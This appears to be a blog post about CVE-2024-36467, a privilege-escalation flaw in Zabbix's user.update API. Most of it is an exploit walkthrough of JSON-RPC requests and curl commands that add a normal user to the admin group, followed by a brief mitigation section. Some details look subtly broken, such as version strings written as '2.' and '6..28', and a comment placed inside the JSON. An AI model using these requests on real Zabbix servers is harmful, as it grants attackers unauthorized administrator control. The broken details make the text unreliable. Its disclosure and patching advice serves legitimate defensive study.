Zabbix is a popular, open-source monitoring platform widely used in IT environments. On June 2024, a critical security vulnerability—CVE-2024-36467—was disclosed. Simply put, if you’re a user with regular API access, you could sneak yourself into powerful admin groups with just a few API calls.
This post will break down the vulnerability, walk through the steps to exploit it, and explain why it matters—using easy, direct language. We’ll also provide links to the original references and show you sample request payloads you could use.
Severity: High (Privilege Escalation)
- Who’s at Risk: Any Zabbix environment where users have access to the user.update API endpoint (which includes the default "User" role in many cases).
- What’s Possible: A normal user can add themselves to *any* group (except those specifically restricted), gaining administrator rights.
- References
- Zabbix Security Advisory
- Zabbix GitHub Issue
🩺 How the Vulnerability Works
Zabbix offers an API endpoint called user.update meant for, among other things, letting users update their details (like their email).
The Problem: The API does NOT properly check permissions when you ask to put yourself in another group. If you can access the API, you can just say, "Hey Zabbix, I'm an admin now"—and it works.
You don’t even need to be an admin (yet)!
Just an authenticated (logged-in) user with API access.
🛠️ Exploit Walkthrough
Let’s see exactly how an attacker would use this flaw.
To use the API, you'll need your own user ID. You can grab this via the API
POST /api_jsonrpc.php
{
"jsonrpc": "2.",
"method": "user.get",
"params": {
"output": "extend",
"filter": {
"alias": "your_username"
}
},
"auth": "YOUR_AUTH_TOKEN",
"id": 1
}
Call the usergroup.get endpoint to list all user groups
POST /api_jsonrpc.php
{
"jsonrpc": "2.",
"method": "usergroup.get",
"params": {
"output": "extend"
},
"auth": "YOUR_AUTH_TOKEN",
"id": 2
}
Now you just need to update your own user and add the admin group
POST /api_jsonrpc.php
{
"jsonrpc": "2.",
"method": "user.update",
"params": {
"userid": "YOUR_USER_ID",
"usrgrps": [
"8" // Replace with the admin group usrgrpid
]
},
"auth": "YOUR_AUTH_TOKEN",
"id": 3
}
If this request works, congratulations—you’re an admin now!
- *If the group has “disabled” or “restricted GUI access” set, it probably won’t work. But most environments don’t use that.*
💥 In-Depth Example with cURL
# Login and get the auth token
curl -s -X POST http://zabbix.example.com/api_jsonrpc.php \
-H 'Content-Type: application/json' \
-d '{
"jsonrpc": "2.",
"method": "user.login",
"params": {
"user": "normal_user",
"password": "userpassword"
},
"id": 1
}'
# Use the auth token in this request to escalate
curl -s -X POST http://zabbix.example.com/api_jsonrpc.php \
-H 'Content-Type: application/json' \
-d '{
"jsonrpc": "2.",
"method": "user.update",
"params": {
"userid": "3",
"usrgrps": ["8"]
},
"auth": "YOUR_AUTH_TOKEN",
"id": 2
}'
All regular users with API access can become full admins!
- Attackers who compromise a Zabbix user account (via password spray, phishing, etc.) can instantly escalate—no other bugs needed.
- This defeats many internal threat models and makes data exfiltration, service disruption, or lateral movement trivial.
🔐 Mitigation
1. Patch Immediately: Zabbix released fixes (6..28/6.4.11 and above). See official Zabbix Advisory.
2. Restrict API access: Use the "User role" permission system to control which users can call user.update.
📝 Original References
- Zabbix Security Advisory (ZBX-24602)
- GitHub Issue #610
- Zabbix Documentation - Permissions
Conclusion
CVE-2024-36467 is a textbook privilege escalation flaw: with a couple of standard API calls, any authenticated user can become an administrator—with all the risks that implies.
*Stay safe, and patch fast!*
*Post by an independent Zabbix security enthusiast*
Timeline
Published on: 11/27/2024 07:15:09 UTC